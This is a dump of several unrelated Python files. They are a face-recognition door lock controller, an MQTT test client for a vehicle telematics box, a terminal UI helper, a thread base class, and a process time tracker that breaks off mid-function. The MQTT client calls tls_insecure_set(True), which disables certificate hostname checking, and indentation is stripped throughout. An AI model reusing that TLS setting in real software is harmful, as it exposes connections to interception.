:param smartLock: object used to access unlocking functions and door status
:type smartLock: SmartLock object
"""
cap = cv2.VideoCapture(0)
#get labels
with open(props['classification']['labels']) as f:
labels_map = json.load(f)
#loading detection model
detection = DetectionEngine(props['detection'])
classification = ClassificationEngine(props['classification']['path'])
while cap.isOpened():
ret, cv2_im = cap.read()
if not ret:
break
# flip picture
cv2_im = cv2.flip(cv2_im,-1)
# Skip classification if door is open
if not smartLock.is_door_closed():
# shuffle all the pixels to make the picture unrecognizable
cv2_im = cv2.randShuffle(cv2_im)
#TODO Indicate that door is open
cv2.imshow('FIDL', cv2_im)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
continue
pil_im = Image.fromarray(cv2_im)
# TODO: check first if there is movement in the picture before utilizing the Edge TPU (power saving)
#searching for faces in the picture
faces = detection.detect_with_image(pil_im,threshold = 0.5, top_k =3,keep_aspect_ratio=True,relative_coord=True)
#check each face and append results to frame
height, width, _= cv2_im.shape
for face in faces:
x0, y0, x1, y1 = face.bounding_box.flatten().tolist()
x0, y0, x1, y1 = int(x0*width), int(y0*height), int(x1*width), int(y1*height)
#crop out face from camera picture
face_im = Image.fromarray(cv2_im[y0:y1,x0:x1])
#classify face
results = classification.classify_with_image(face_im,threshold=0.1,top_k=3)
#annotate frame
best_result = (0,0) # index, score
text_lines = []
for index, score in results:
if score > best_result[1]:
best_result = (index, score)
text_lines.append('score=%.2f: %s' % (score, labels_map[str(index)])) #TODO decide to show all scores or only best score
access_granted = props['user'][labels_map[str(best_result[0])]]['access'] and best_result[1] >= 0.9
#open the door
if access_granted and smartLock.unlocking == False:
threading.Thread(target = smartLock.unlock, daemon = True).start()
# TODO indicate unlocking
#Coloring green if access was granted
cv2_im = cv2.rectangle(cv2_im, (x0, y0), (x1, y1), (0, 255, 0) if access_granted else (0,0,255), 2)
for y, line in enumerate(text_lines):
cv2.putText(cv2_im,line,(x0 + 10,y0 + y*20+20),fontFace=cv2.FONT_HERSHEY_SIMPLEX,fontScale =0.5, color=(255, 255, 255))
cv2.imshow('FIDL', cv2_im)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
class SmartLock(object):
"""
An object for easily interacting with the SmartLock, which consists of an ultrasonic sensor, a relay, a door sensor and a servo motor.
Functionality:
Fetching the distance from the ultrasonic sensor
Approximating the approach speed
Changing the state of the relay
Fetching the status of the door (closed/open)
Manually setting the angle of the servo motor
Unlocking the lock (a predefined sequence of servo and relay commands)
Automatic unlocking when approaching the door
"""
def __init__(self, trig_pin = 18, echo_pin = 24, relais_pin = 23, door_sensor_pin = 25, servo_pin = 13, max_distance = 100):
"""
:param trig_pin: The pin attached to the trigger pin of the ultra sonic sensor (BCM)
:type trig_pin: int
:param echo_pin: The pin attached to the echo pin of the ultra sonic sensor (BCM)
:type echo_pin: int
:param relais_pin: The pin attached to the relay (BCM)
:type relais_pin: int
:param door_sensor_pin: The pin attached to the door sensor (BCM)
:type door_sensor_pin: int
:param servo_pin: The pin attached to the servo motor (BCM)
:type servo_pin: int
:param max_distance: The maximum distance the ultrasonic sensor should consider when gathering the distance
:type max_distance: int
"""
self.trig_pin = trig_pin
self.echo_pin = echo_pin
self.relais_pin = relais_pin
self.door = door_sensor_pin
self.servo_pin = servo_pin
self.max_distance = max_distance
# initializing the data from the ultrasonic sensor as None
self.measurements = []
self._reset_measurements()
self.unlocking = False
def _init_GPIO(self):
"""
Initializing all the GPIO settings
"""
GPIO.setmode(GPIO.BCM)
#setting up GPIO
GPIO.setup(self.trig_pin, GPIO.OUT)
GPIO.setup(self.echo_pin, GPIO.IN)
GPIO.setup(self.relais_pin, GPIO.OUT)
GPIO.setup(self.door,GPIO.IN, pull_up_down = GPIO.PUD_UP)
GPIO.setup(self.servo_pin,GPIO.OUT)
# Turn relay off
GPIO.output(self.relais_pin, GPIO.LOW)
#set servo frequency and start pulse
# you may edit the frequency depending on the frequency of your servo
self.pulse = GPIO.PWM(self.servo_pin, 50)
self.pulse.start(0)
def is_door_closed(self):
"""
Returning the status of the door by reading the door sensor
Returns True if the door is closed
:return type: boolean
"""
return GPIO.input(self.door)
### Ultrasonic sensor and related algorithms ###
def _reset_measurements(self):
"""
setting all measurements to None
"""
self.measurements = [(None, None) for i in range(10)]
def get_distance(self):
"""
Fetching the distance from the ultrasonic sensor within the defined range
Returning None if the distance is greater than the predefined max_distance
Measurements are in centimeters
:return type: float or None
"""
# Triggering the ultrasonic sensor to emit a sound pulse.
GPIO.output(self.trig_pin, True)
time.sleep(0.00001)
GPIO.output(self.trig_pin, False)
# initializing time variables
StartTime = time.time()
StopTime = time.time()
# Fetching the start time until the output of the echo pin of the sensor changes from low to high
while GPIO.input(self.echo_pin) == 0:
StartTime = time.time()
#Fetching end time
while GPIO.input(self.echo_pin) == 1:
StopTime = time.time()
# time difference between start and arrival
TimeElapsed = StopTime - StartTime
# multiply by the speed of sound in air (34300 cm/s) and account for the double travel distance
distance = round((TimeElapsed * 34300) / 2, 2)
#ignoring all values which are not in range
if distance > self.max_distance:
return None
return distance
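# Worked example of the formula above: if the echo returns after TimeElapsed = 0.0006 s,
# the distance is (0.0006 * 34300) / 2 = 10.29 cm; with the default max_distance of
# 100 cm, any echo taking longer than roughly 5.8 ms is treated as out of range (None).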
def approach_detected(self):
"""
Function to determine if something is approaching the sensor
This uses linear regression to approximate the approach speed
:return type: boolean
"""
if any([None in pt for pt in self.measurements]): #TODO fix that somehow
# Not enough data has been gathered yet
return False
#using linear regression to determine an approach
x = [pt[0] for pt in self.measurements]
x_mean = round(sum(x) / len(x), 2)
y = [pt[1] for pt in self.measurements]
y_mean = round(sum(y) / len(y), 2)
#slope is equivalent to the approaching speed
speed = round(sum([(pt[0] - x_mean)*(pt[1] - y_mean) for pt in self.measurements])/sum([(x-x_mean)**2 for x in x]),2)
# threshold is an approach speed of 30 cm per second
if speed <= -30:
return True
#no approach
return False
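# Worked example for the regression above (illustrative numbers): with samples taken
# every 0.1 s and the distance dropping linearly from 90 cm to 45 cm across the ten
# stored measurements, the slope is about (45 - 90) / 0.9 = -50 cm/s, which is below
# the -30 cm/s threshold, so approach_detected() would return True.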
#####################################################
#### Servo and related algorithms ####
def _set_servo_angle(self,angle):
"""
Moving the Servo motor to a predefined valid angle
:param angle: an angle between 0 and 180
:type angle: int
"""
if angle >= 0 and angle <= 180:
# you may change this depending on your servo
duty = float(angle) /12
self.pulse.ChangeDutyCycle(duty)
time.sleep(1)
# 0 pulse means it is inactive
self.pulse.ChangeDutyCycle(0)
def _set_servo_power(self, state):
"""
Powering the servo motor on/off with the relay
:param state: True for High (on), False for Low (off)
:type state: boolean
"""
GPIO.output(self.relais_pin, state)
def unlock(self):
"""
Sequence to unlock the door by using the servo motor
You may edit the angles to adjust it to your lock
"""
self.unlocking = True
#power servo on
self._set_servo_power(True)
#moving servo to unlocking position
self._set_servo_angle(30)
time.sleep(5)
# moving the servo back to a resting position
self._set_servo_angle(72)
#giving the servo enough time to move there before turning it off
time.sleep(2)
self._set_servo_power(False)
self.unlocking = False
##################################################
def run(self):
"""
Constantly checking whether someone tries to leave the room, in order to unlock the door
"""
try:
self._init_GPIO()
# move servo to resting position
self._set_servo_power(True)
self._set_servo_angle(72)
time.sleep(2)
self._set_servo_power(False)
# taking measurements and checking the approach status
while True:
#unlocking is only relevant if the door is closed
if self.is_door_closed():
for i in range(len(self.measurements)):
self.measurements[i] = (time.time(),self.get_distance())
time.sleep(0.1)
if not self.is_door_closed():
self._reset_measurements()
break
elif self.approach_detected() and self.unlocking == False:
#unlocking the door
self.unlock()
self._reset_measurements()
except KeyboardInterrupt:
# move servo to resting position
self._set_servo_power(True)
self._set_servo_angle(72)
time.sleep(2)
self.pulse.stop()
self._set_servo_power(False)
GPIO.cleanup()
# TODO: turn the relay on well in advance (maybe the servo as well) because there might be issues with switching it right before moving the servo
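# --- Usage sketch (added for illustration, not part of the original control flow) ---
# A minimal example of how SmartLock and the recognition loop are intended to be wired
# together: the ultrasonic auto-unlock loop runs in a background thread while
# facial_recogntion() processes the camera feed. The pin numbers match the class
# defaults; `props` is assumed to be the properties dictionary used elsewhere in this file.
def _smartlock_demo(props):
    lock = SmartLock(trig_pin=18, echo_pin=24, relais_pin=23, door_sensor_pin=25, servo_pin=13)
    # run the auto-unlock loop in the background
    threading.Thread(target=lock.run, daemon=True).start()
    # run the camera/AI loop in the foreground until 'q' is pressed
    facial_recogntion(props, lock)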
|
MqttComm.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (C) 2015-2018 Shenzhen Auto-link world Information Technology Co., Ltd.
All Rights Reserved
Name: MqttComm.py
Purpose:
Created By: Clive Lau <liuxusheng@auto-link.com.cn>
Created Date: 2018-01-11
Changelog:
Date Desc
2018-01-11 Created by Clive Lau
"""
# Builtin libraries
import time
import threading
# Third-party libraries
from robot.api import logger
import paho.mqtt.client as mqtt
# Customized libraries
from Protobuf import tbox_pb2
from MqttDump import MqttDump
from CanComm.CanProtoDFSK import EnumDoorStatus
from CanComm.CanProtoDFSK import EnumLockStatus
from CanComm.CanProtoDFSK import EnumHandbrakeStatus
from CanComm.CanProtoDFSK import EnumAcOnOffStatus
from CanComm.CanProtoDFSK import EnumEmsEngineStatus
from CanComm.CanProtoDFSK import EnumWiperStatus
from CanComm.CanProtoDFSK import EnumGearPos
# MQTT Server Settings
MQTT_MAJOR_SERVER = "test.mosquitto.org"
# MQTT_MINOR_SERVER = "14.21.42.158"
MQTT_MINOR_SERVER = "192.168.3.8"
MQTT_MAJOR_ENCRYPTION = "Encryption/mosquitto.org.crt"
MQTT_MINOR_ENCRYPTION = "Encryption/autolink_tbox.crt"
MQTT_SERVER_PORT = 8883
MQTT_USER = ""
MQTT_PWD = ""
# MQTT Topic Settings
MQTT_WILL_TOPIC = "all/will"
MQTT_REPORT_TOPIC = "device/gate/report"
MQTT_BUSINESS_TOPIC = "device/gate/business"
MQTT_DEVICE_TOPIC_PREFIX = "gate/per/device/"
MQTT_DEVICE_TOPIC_SUFFIX = "/order"
class MqttComm(object):
""""""
IPADDRS = {'mosquitto.org': 'test.mosquitto.org', 'auto-link.com.cn': '192.168.3.8'}
def __init__(self, expected_device, server):
# LogTag
self._tag = self.__class__.__name__ + ' '
logger.info(self._tag + "__init__ called")
# Message head parameter
self._protocol_version = 0
self._equipment_id_type = tbox_pb2.PDID
self._msg_id = 1
self._token = "token-" + expected_device
# MQTT parameter
self._mqttc = None
self._expected_device = expected_device
self._server = MqttComm.IPADDRS[server]
self._is_connected = False
self._msgtop = None
self._handle_topic_dict = {
MQTT_WILL_TOPIC: self.__handle_topic_will,
MQTT_REPORT_TOPIC: self.__handle_topic_report,
MQTT_BUSINESS_TOPIC: self.__handle_topic_business,
}
self._handle_report_dict = {
tbox_pb2.DATAMINING: self.__on_response_datamining,
tbox_pb2.VEHICLE_STATUS: self.__on_response_vehicle,
}
self._handle_business_dict = {
tbox_pb2.LOGIN: self.__on_response_login,
tbox_pb2.REMOTE_CONFIG_RESULT: self.__on_response_remote_config,
}
# Sync parameter
self._event = threading.Event()
self._result = False
# Threading parameter
self._parse_thread = None
# CAN msg parameter
self._can_msg_type = None
self._can_config_item = None
self._can_config_data = None
def __del__(self):
logger.info(self._tag + "__del__ called")
def on_create(self):
logger.info(self._tag + "on_create called")
# MsgTop
self._msgtop = tbox_pb2.MsgTop()
# MQTT onCreate
self._mqttc = mqtt.Client()
encryption = MQTT_MAJOR_ENCRYPTION if self._server == MQTT_MAJOR_SERVER else MQTT_MINOR_ENCRYPTION
if encryption != '':
try:
self._mqttc.tls_set(encryption)
self._mqttc.tls_insecure_set(True)
except Exception as e:
logger.error(self._tag + "Exception on set MQTT TLS: " + str(e))
if MQTT_USER != '':
self._mqttc.username_pw_set(MQTT_USER, MQTT_PWD)
self._mqttc.on_connect = self.__on_connect
self._mqttc.on_message = self.__on_message
try:
self._mqttc.connect(self._server, MQTT_SERVER_PORT)
self._mqttc.loop_start()
except Exception as e:
logger.error(self._tag + "Exception on connect MQTT Server: " + str(e))
return False
return True
def on_destroy(self):
logger.info(self._tag + "on_destroy called")
# MQTT onDestroy
if self._mqttc is None:
return
self._mqttc.unsubscribe(MQTT_WILL_TOPIC)
self._mqttc.unsubscribe(MQTT_REPORT_TOPIC)
self._mqttc.unsubscribe(MQTT_BUSINESS_TOPIC)
self._mqttc.loop_stop(True)
self._mqttc.disconnect()
@property
def is_connected(self):
logger.console(self._tag + "is connected: " + str(self._is_connected))
return self._is_connected
def __on_connect(self, client, userdata, flags, rc):
logger.console(self._tag + "Connected with result:" + mqtt.connack_string(rc))
client.subscribe(MQTT_WILL_TOPIC, qos=1)
client.subscribe(MQTT_REPORT_TOPIC, qos=1)
client.subscribe(MQTT_BUSINESS_TOPIC, qos=1)
def __on_message(self, client, userdata, msg):
logger.console(self._tag + "=====================New Message=====================")
self._parse_thread = threading.Thread(target=self.__parse_thread, args=(client, userdata, msg,), name='on_parse')
self._parse_thread.daemon = True
self._parse_thread.start()
self._parse_thread.join()
def __parse_thread(self, client, userdata, msg):
logger.console((self._tag + "__parse_thread called"))
self._handle_topic_dict[msg.topic](client, userdata, msg)
def __handle_topic_will(self, client, userdata, msg):
logger.console(self._tag + "__handle_topic_will called")
logger.console(self._tag + msg.payload)
if self._expected_device == msg.payload:
logger.warn("Entry WILL Topic: " + msg.payload)
self._is_connected = False
def __handle_topic_report(self, client, userdata, msg):
logger.console(self._tag + "__handle_topic_report called")
msgtop = tbox_pb2.MsgTop()
msgtop.ParseFromString(msg.payload)
if self.__is_valid_device(msgtop):
# set parameter
if not self._is_connected:
self._protocol_version = msgtop.message_head.protocol_version
self._equipment_id_type = msgtop.message_head.equipment_id_type
self._msg_id = msgtop.message_head.message_id
self._token = "token-" + self._expected_device
self._is_connected = True
MqttDump.dump(msgtop)
handle = self._handle_report_dict.get(msgtop.message_head.msg_type, None)
if handle is not None:
handle(client, userdata, msgtop)
def __handle_topic_business(self, client, userdata, msg):
logger.console(self._tag + "__handle_topic_business called")
msgtop = tbox_pb2.MsgTop()
msgtop.ParseFromString(msg.payload)
if self.__is_valid_device(msgtop):
# set parameter
if not self._is_connected:
self._protocol_version = msgtop.message_head.protocol_version
self._equipment_id_type = msgtop.message_head.equipment_id_type
self._msg_id = msgtop.message_head.message_id
self._token = "token-" + self._expected_device
self._is_connected = True
MqttDump.dump(msgtop)
handle = self._handle_business_dict.get(msgtop.message_head.msg_type, None)
if handle is not None:
handle(client, userdata, msgtop)
def __on_response_datamining(self, client, userdata, msgtop):
self._msgtop.datamining.CopyFrom(msgtop.datamining)
def __on_response_vehicle(self, client, userdata, msgtop):
self._msgtop.vehicle_status.CopyFrom(msgtop.vehicle_status)
def __inc_msg_id(self):
self._msg_id = (self._msg_id + 1) % 0xFFFF
if self._msg_id == 0:
self._msg_id = 1
return self._msg_id
def __is_valid_device(self, msgtop):
logger.info(self._tag + "__is_valid_device called, DevId:" + msgtop.message_head.equipment_id)
return msgtop.message_head.equipment_id == self._expected_device
def __fill_message_head(self, msgtop, msg_id, msg_type, flag=False):
msgtop.message_head.protocol_version = self._protocol_version
msgtop.message_head.equipment_id_type = self._equipment_id_type
msgtop.message_head.equipment_id = self._expected_device
msgtop.message_head.message_id = msg_id
msgtop.message_head.msg_type = msg_type
msgtop.message_head.message_create_time = int(time.time())
msgtop.message_head.token = self._token
msgtop.message_head.flag = flag
def __on_response_login(self, client, userdata, msgtop):
""" on_response_login """
logger.console(self._tag + "on_response_login called")
# set parameter
if not self._is_connected:
self._protocol_version = msgtop.message_head.protocol_version
self._equipment_id_type = msgtop.message_head.equipment_id_type
self._msg_id = msgtop.message_head.message_id
self._token = "token-" + self._expected_device
self._is_connected = True
publish_msg = tbox_pb2.MsgTop()
# message_head
self.__fill_message_head(publish_msg, self._msg_id, tbox_pb2.LOGIN_RESPONSE)
# login_response
publish_msg.login_response.ack_code.ack_code = tbox_pb2.SUCCESS
publish_msg.login_response.ack_code.code_desp = "Succeed to login"
publish_msg.login_response.token = self._token
# publish
client.publish(MQTT_DEVICE_TOPIC_PREFIX + self._expected_device + MQTT_DEVICE_TOPIC_SUFFIX,
publish_msg.SerializeToString())
logger.console(self._tag + "on_response_login done")
def __set_remote_config_item(self, msgtop, item, data):
if item == tbox_pb2.MQTT_SERVER_ADDR:
msgtop.remote_config_request.config_data.mqtt_server_addr = data
elif item == tbox_pb2.MQTT_SERVER_TOPIC:
msgtop.remote_config_request.config_data.mqtt_server_topic = data
elif item == tbox_pb2.MQTT_KEY_BUSINESS_SERVER_ADDR:
msgtop.remote_config_request.config_data.mqtt_key_business_server_addr = data
elif item == tbox_pb2.MQTT_KEY_BUSINESS_SERVER_TOPIC:
msgtop.remote_config_request.config_data.mqtt_key_business_server_topic = data
elif item == tbox_pb2.ECALL_NUMBER:
msgtop.remote_config_request.config_data.ecall_number = data
elif item == tbox_pb2.BCALL_NUMBER:
msgtop.remote_config_request.config_data.bcall_number = data
elif item == tbox_pb2.ICALL_NUMBER:
msgtop.remote_config_request.config_data.icall_number = data
elif item == tbox_pb2.ECALL_ENABLE:
msgtop.remote_config_request.config_data.ecall_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.BCALL_ENABLE:
msgtop.remote_config_request.config_data.bcall_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.ICALL_ENABLE:
msgtop.remote_config_request.config_data.icall_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.SMS_GATE_NUMBER_UPLOAD:
msgtop.remote_config_request.config_data.sms_gate_number_upload = data
elif item == tbox_pb2.SMS_GATE_NUMBER_DOWNLOAD:
msgtop.remote_config_request.config_data.sms_gate_number_download = data
elif item == tbox_pb2.DATAMINING_UPLOAD_FREQUENCY:
msgtop.remote_config_request.config_data.datamining_upload_frequency = int(data)
elif item == tbox_pb2.VEHICLE_STATUS_UPLOAD_FREQUENCY:
msgtop.remote_config_request.config_data.vehicle_status_upload_frequency = int(data)
elif item == tbox_pb2.IGNITION_BLOWOUT_UPLOAD_ENABLE:
msgtop.remote_config_request.config_data.ignition_blowout_upload_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.UPLOAD_ALERT_ENABLE:
msgtop.remote_config_request.config_data.upload_alert_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.SVT_ENABLE:
msgtop.remote_config_request.config_data.svt_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.ELETRONIC_DEFENSE_ENABLE:
msgtop.remote_config_request.config_data.eletronic_defense_enable = True if data.lower() == 'true' else False
elif item == tbox_pb2.ABNORMAL_MOVE_THRESHOLD_VALUE:
msgtop.remote_config_request.config_data.abnormal_move_threshold_value = True if data.lower() == 'true' else False
else:
logger.error(self._tag + "Invalid RemoteConfigItem")
def __on_response_remote_config(self, client, userdata, msgtop):
""" on_response_remote_config """
logger.console(self._tag + "on_response_remote_config called")
if self._msg_id != msgtop.message_head.message_id:
logger.warn(self._tag + "on_response_remote_config: Not expected msg_id")
return
if msgtop.HasField("remote_config_result"):
# TODO: Handle receiving multiple config_items
for config in msgtop.remote_config_result.config_results:
self._result = config.result
self._event.set()
def on_request_remote_config(self, item, data, timeout):
"""
"""
logger.info(self._tag + "on_request_remote_config called")
convert_config_item_dict = {
'MQTT_SERVER_ADDR': tbox_pb2.MQTT_SERVER_ADDR,
'MQTT_SERVER_TOPIC': tbox_pb2.MQTT_SERVER_TOPIC,
'MQTT_KEY_BUSINESS_SERVER_ADDR': tbox_pb2.MQTT_KEY_BUSINESS_SERVER_ADDR,
'MQTT_KEY_BUSINESS_SERVER_TOPIC': tbox_pb2.MQTT_KEY_BUSINESS_SERVER_TOPIC,
'ECALL_NUMBER': tbox_pb2.ECALL_NUMBER,
'BCALL_NUMBER': tbox_pb2.BCALL_NUMBER,
'ICALL_NUMBER': tbox_pb2.ICALL_NUMBER,
'ECALL_ENABLE': tbox_pb2.ECALL_ENABLE,
'BCALL_ENABLE': tbox_pb2.BCALL_ENABLE,
'ICALL_ENABLE': tbox_pb2.ICALL_ENABLE,
'SMS_GATE_NUMBER_UPLOAD': tbox_pb2.SMS_GATE_NUMBER_UPLOAD,
'SMS_GATE_NUMBER_DOWNLOAD': tbox_pb2.SMS_GATE_NUMBER_DOWNLOAD,
'DATAMINING_UPLOAD_FREQUENCY': tbox_pb2.DATAMINING_UPLOAD_FREQUENCY,
'VEHICLE_STATUS_UPLOAD_FREQUENCY': tbox_pb2.VEHICLE_STATUS_UPLOAD_FREQUENCY,
'IGNITION_BLOWOUT_UPLOAD_ENABLE': tbox_pb2.IGNITION_BLOWOUT_UPLOAD_ENABLE,
'UPLOAD_ALERT_ENABLE': tbox_pb2.UPLOAD_ALERT_ENABLE,
'DATAMING_ENABLE': tbox_pb2.DATAMING_ENABLE,
'SVT_ENABLE': tbox_pb2.SVT_ENABLE,
'ELETRONIC_DEFENSE_ENABLE': tbox_pb2.ELETRONIC_DEFENSE_ENABLE,
'ABNORMAL_MOVE_THRESHOLD_VALUE': tbox_pb2.ABNORMAL_MOVE_THRESHOLD_VALUE,
}
config_item = convert_config_item_dict[item]
self._result = False
publish_msg = tbox_pb2.MsgTop()
# message_head
self.__fill_message_head(publish_msg, self.__inc_msg_id(), tbox_pb2.REMOTE_CONFIG_REQUEST)
# remote_config_request
publish_msg.remote_config_request.config_items.append(config_item)
self.__set_remote_config_item(publish_msg, config_item, data)
# publish
self._mqttc.publish(MQTT_DEVICE_TOPIC_PREFIX + self._expected_device + MQTT_DEVICE_TOPIC_SUFFIX, publish_msg.SerializeToString())
MqttDump.dump(publish_msg, logger.info)
# wait_event
self._event.wait(int(timeout))
if not self._event.isSet() or not self._result:
logger.error(self._tag + "Exception on remote_config_request: Timeout to wait event")
self._event.clear()
return self._result
def on_request_can_data(self, item, timeout):
"""
"""
logger.info(self._tag + "on_request_can_data called")
data_dict = {
'ENGINE_SPEED': self._msgtop.datamining.engine_speed,
'DRIVER_DOOR_STS': EnumDoorStatus.Open.name if self._msgtop.vehicle_status.lf_door_status == tbox_pb2.ONOFF_STATE_ON else EnumDoorStatus.Close.name,
'PASSENGER_DOOR_STS': EnumDoorStatus.Open.name if self._msgtop.vehicle_status.rf_door_status == tbox_pb2.ONOFF_STATE_ON else EnumDoorStatus.Close.name,
'LEFTREAR_DOOR_STS': EnumDoorStatus.Open.name if self._msgtop.vehicle_status.lr_door_status == tbox_pb2.ONOFF_STATE_ON else EnumDoorStatus.Close.name,
'RIGHTREAR_DOOR_STS': EnumDoorStatus.Open.name if self._msgtop.vehicle_status.rr_door_status == tbox_pb2.ONOFF_STATE_ON else EnumDoorStatus.Close.name,
'TAILGATE_STS': EnumDoorStatus.Open.name if self._msgtop.vehicle_status.trunk_door_status == tbox_pb2.ONOFF_STATE_ON else EnumDoorStatus.Close.name,
'DRIVER_DOOR_LOCK_STS': EnumLockStatus.Locked.name if self._msgtop.vehicle_status.lock_status == tbox_pb2.ONOFF_STATE_ON else EnumLockStatus.Unlock.name,
'HANDBRAKE_SIGNAL': EnumHandbrakeStatus.Up.name if self._msgtop.vehicle_status.hand_break_status == tbox_pb2.ONOFF_STATE_ON else EnumHandbrakeStatus.Down.name,
'AC_STS': EnumAcOnOffStatus.On.name if self._msgtop.vehicle_status.air_condition_status == tbox_pb2.ONOFF_STATE_ON else EnumAcOnOffStatus.Off.name,
'FRONT_DEFROST_STS': EnumAcOnOffStatus.On.name if self._msgtop.vehicle_status.air_condition_defrost_status == tbox_pb2.ONOFF_STATE_ON else EnumAcOnOffStatus.Off.name,
'REAR_DEFROST_STS': EnumAcOnOffStatus.On.name if self._msgtop.vehicle_status.air_condition_rear_defrost_status == tbox_pb2.ONOFF_STATE_ON else EnumAcOnOffStatus.Off.name,
'AC_TEMPERATURE': str(self._msgtop.vehicle_status.air_condition_temperature),
'ENGINE_STS': EnumEmsEngineStatus.KeyOff.name if self._msgtop.vehicle_status.engine_status == tbox_pb2.ENGINESTATE_UNKNOWN else EnumEmsEngineStatus(self._msgtop.vehicle_status.engine_status - 1).name,
'WIPER_STS': ('On' if self._msgtop.vehicle_status.wiper_Status == tbox_pb2.ONOFF_STATE_ON else 'Off'),
'GEAR_STS': EnumGearPos.S.name if self._msgtop.vehicle_status.gear_position == tbox_pb2.GEAR_S else EnumGearPos(self._msgtop.vehicle_status.gear_position).name,
}
return data_dict[item]
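# --- Usage sketch (illustrative only; the device id and config values are assumptions) ---
# comm = MqttComm(expected_device="PDID0123456789", server="auto-link.com.cn")
# comm.on_create()                                        # connect, subscribe and start the MQTT loop
# if comm.is_connected:
#     comm.on_request_remote_config("ECALL_ENABLE", "true", timeout=10)
#     print(comm.on_request_can_data("ENGINE_SPEED", timeout=10))
# comm.on_destroy()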
if __name__ == '__main__':
pass
|
interface.py
|
from .file_manager import download_json, download_text
from .general_tools import utf_decoder
from threading import Thread
from time import sleep
import platform
def form_result_from_cp(control_package, frame):
objs_amount = len(control_package["objs_for_anim"]) + \
len(control_package["dynamic_values"])
result_list = [None for i in range(objs_amount)]
for anim_obj in control_package["objs_for_anim"]:
result_list[anim_obj[1]] = anim_obj[0][frame % len(anim_obj[0])]
for dyn_val in control_package["dynamic_values"]:
result_list[dyn_val[1]] = dyn_val[0]
return result_list
def animator(control_package):
frame = 0
biggest_anim = max([len(obj[0]) for obj in
control_package["objs_for_anim"]])
while not control_package["stop"]:
result_list = form_result_from_cp(control_package, frame)
res = control_package["msg"].format(*result_list)
cterm("animation", res, "inf")
frame = (frame + 1) % biggest_anim
sleep(1 / control_package["fps"])
def create_animation(control_package):
"""
"control_package" : {
"msg" : special format string,
"objs_for_anim" : [
[anim_list, pos], ...
],
"dynamic_values" : [
[value, pos], ...
],
"fps": value of fps
}
"""
control_package["stop"] = False
anim_id = Thread(target=animator, args=(control_package, ))
anim_id.start()
return anim_id
def destroy_animation(anim_id, control_package):
control_package["stop"] = True
anim_id.join()
cterm("output", "", "inf")
def render_static(file):
header = download_text(file)
if header:
cterm("output", utf_decoder(header), "inf")
else:
header = "**** No header ****"
cterm("output", header, "inf")
def cterm(com_type, message, message_type):
"""
com_type - whether this is input, output or animation
message - the text
message_type - type from iface.json
"""
begin = iface_init.iface["colors"][iface_init.iface["pallete"][message_type]]
marker = iface_init.iface["markers"][message_type]
res_line = f"{begin}{marker}{message}"
if com_type == "input":
res_line += iface_init.iface["colors"][iface_init.iface["pallete"]["def"]]
return input(res_line)
if com_type == "animation":
print("\r" + res_line, end="")
else:
print(res_line)
def iface_init(profile_dir):
try:
iface_init.iface = download_json(profile_dir + "iface.json")
if platform.system() == 'Windows':
for color in iface_init.iface["colors"]:
iface_init.iface["colors"][color] = ""
render_static(profile_dir + "crypto.header")
except FileNotFoundError:
exit()
iface_init.iface = None # TODO: make this better
|
base_thread_module.py
|
from abc import abstractmethod
from threading import Thread
from up.base_started_module import BaseStartedModule
class BaseThreadModule(BaseStartedModule):
def __init__(self):
super().__init__()
self.__thread = None
self.__run = False
def _execute_initialization(self):
super()._execute_initialization()
def _execute_start(self):
super()._execute_start()
self.__thread = Thread(target=self._loop, name="Thread-%s" % self.__class__.__name__)
self.__run = True
self.__thread.start()
return True
def _execute_stop(self):
super()._execute_stop()
self.__run = False
if self.__thread:
self.__thread.join()
self.__thread = None
@abstractmethod
def _loop(self):
pass
@property
def _run(self):
return self.__run
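# --- Illustrative sketch (not part of the up framework): a minimal subclass showing the
# intended lifecycle. _execute_start() spawns the thread, _loop() polls for as long as
# _run is True, and _execute_stop() clears the flag and joins the thread. The polling
# interval below is an arbitrary assumption.
class _ExamplePollingModule(BaseThreadModule):
    def _loop(self):
        from time import sleep
        while self._run:
            # poll a (hypothetical) sensor, queue or socket here
            sleep(0.1)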
|
Main.py
|
#!/usr/bin/env python3.6
"""Main class of the Time Manager."""
# System imports
import sys
import time
import os
from threading import Thread
# Local import
import OSFactory
import ProcessFileManager
import TimeActivity
import UIServer
class TimeManager(object):
"""Time manager main class."""
def __init__(self):
"""Constructor."""
self.__osFactory = OSFactory.OSFactory()
self.__processeFileManager = ProcessFileManager.ProcessFileManager()
self.__timeActivity = TimeActivity.TimeActivity()
self.__os = self.__getOS()
self.__processCounter = {}
# This is a generic counter for different processes within the main loop
self.__mainCounter = {'saveSession': 0}
def run(self):
"""Run the main app and start recording the processes use."""
osConfig = self.__os.getConfig()
while True:
processToClose = self.__os.getClosedProcesses()
# Iterate over tracked processes and wait the configured number of cycles before declaring them idle.
for processId, counter in self.__processCounter.items():
if counter == osConfig['idleCycles']:
processToClose.append(processId)
continue
self.__processCounter[processId] += 1
# Clean the counter
for id in processToClose:
if id in self.__processCounter:
del self.__processCounter[id]
# Stop the processes that are idle
self.__processeFileManager.stopProcesses(processToClose)
# Get active processes and register them
processes = self.__os.getActiveProcesses()
for process in processes:
# Clean the name for windows processes
procName = process.info['name'].lower().replace('.exe', '')
self.__processeFileManager.registerActiveProcess(procName, process.info['pid'])
self.__processCounter[process.pid] = 0
# Save session
if self.__mainCounter['saveSession'] == osConfig['saveSessionCycles']:
self.saveSession()
self.__mainCounter['saveSession'] = 0
else:
self.__mainCounter['saveSession'] += 1
# Wait for lookup seconds to look for more processes
time.sleep(osConfig['lookupTime'])
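# Worked example of the idle logic above (config values are hypothetical): with
# lookupTime = 5 s and idleCycles = 12, a process that stops appearing in
# getActiveProcesses() keeps incrementing its counter once per loop and is declared
# idle (its session entry is stopped) after roughly 12 * 5 = 60 seconds.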
def getCurrentTimePerProcess(self):
"""Calculate the time per process base on the current session."""
return self.__timeActivity.getCurrentTimePerProcess(self.__processeFileManager.getProcessSession())
def getWeeklyTime(self):
"""Calculate the time per process base on the current session."""
savedSession = self.__processeFileManager.getSavedSession()
return self.__timeActivity.getProcessesByTime(savedSession, days=7)
def saveSession(self):
